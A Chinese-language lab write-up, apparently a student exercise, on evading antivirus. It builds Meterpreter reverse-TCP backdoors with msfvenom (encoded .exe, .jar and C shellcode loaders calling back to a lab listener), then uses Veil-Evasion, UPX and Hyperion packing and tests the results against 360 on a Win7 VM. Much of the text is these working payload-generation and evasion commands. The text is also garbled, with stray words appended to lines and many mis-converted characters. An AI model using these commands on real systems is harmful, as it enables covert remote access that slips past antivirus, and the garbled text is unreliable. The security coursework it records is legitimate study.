使用msfvenom -p windows/meterpreter/reversetcp -e x86/shikataga_nai -i 10 -b ‘\x00’ LHOST=192.168.235.144 LPORT=5212 -f exe >fenix.exe指令進行屢次編碼,生成.exe的後門程序 java
放到windows系統中,360確定是能夠直接發現的,沒有測試的必要python
使用virscan進行掃描,結果以下所示: shell
用msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.235.144 lport=5212 x> 5212met.jar生成.jar的後門程序編程
使用msfconsole回連成功 (沒啓動殺軟)windows
放到windows7系統中,殺軟並發現它了,掃描沒問題,可是運行會查殺安全
使用virscan進行掃描,結果以下所示: 網絡
檢測率下降了,但沒有實現免殺併發
輸入veil,啓用veilapp
輸入use evasion,進入veil-evasiontcp
輸入list,查看可生成文件的格式
輸入use 7,選擇C語言格式
用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.235.144 LPORT=5212 -f c生成一段shellcode
利用shellcode編寫一個C語言程序後門,再用i686-w64-mingw32-g++ feniexp3.c -o fenixexp3.exe編譯運行後,測試其可用性
int main() { int (func)() = (int()())buf; func(); } - 生成文件如圖
直接用.C交叉編譯生成的exe文件複製到Windows中是沒法運行的,錯誤提示BEX,是win下面相似堆棧保護的機制(可是UPX壓索殼加密後能夠運行可用回連;upx加殼後的exe再用hyperion加密殼加密後不可再win下面不能夠運行,錯誤提示appcrash,此次緣由再也不是堆棧保護機制,而是編譯C生成的EXE文件這麼一層一層弄下來文件自己壞了)
upx加密的EXE成功鏈接
對任務一中使用Veil,c/meterpreter/rev_tcp.py生成的fenixveil.exe可執行文件加UPX壓縮殼嘗試實現免殺 被控機是Win7虛擬機,電腦殺軟爲360(最新版就這周安裝的)
在安裝運行Veil-Evasion時,遇到不少錯,很棘手
C交叉編譯生成的exe文件、hyperion加密殼生成的exe文件在win7下沒法執行。
(1)殺軟是如何檢測出惡意代碼的?
(3)免殺的基本方法有哪些?